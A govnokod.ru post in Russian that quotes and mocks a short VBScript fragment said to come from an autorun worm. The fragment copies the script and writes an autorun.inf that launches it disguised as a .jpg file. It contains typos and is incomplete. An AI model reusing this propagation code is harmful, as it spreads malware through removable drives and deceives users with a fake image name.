1. Список говнокодов пользователя Pyriandr

    Всего: 1

  2. VisualBasic / Говнокод #18506

    −97

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    if (not fso.fileexists(fname)) or (not fso.fileexixts(aname)) then
    	if (fso.fileexists(fname)=false) then
    		fso.copyfile wscript.scriptname,fname
    	end if
    	if (fso.fileexists(aname)=false) then
    		set au=fso.createtextfile aname,2,true
    		au.writeline "[AutoRun]"
    		au.writeline "shellexecute=wscript /e:vbs pamela handerson.jpg -autostart"
    		au.close
    		fso.getfile(aname).attributes=32
    		set au=nothing
    	end if
    end if
    ...

    Взято из кода одного autorun-червя. Вопрос: нахуя?

    Pyriandr, 21 Июля 2015

    Комментарии (17)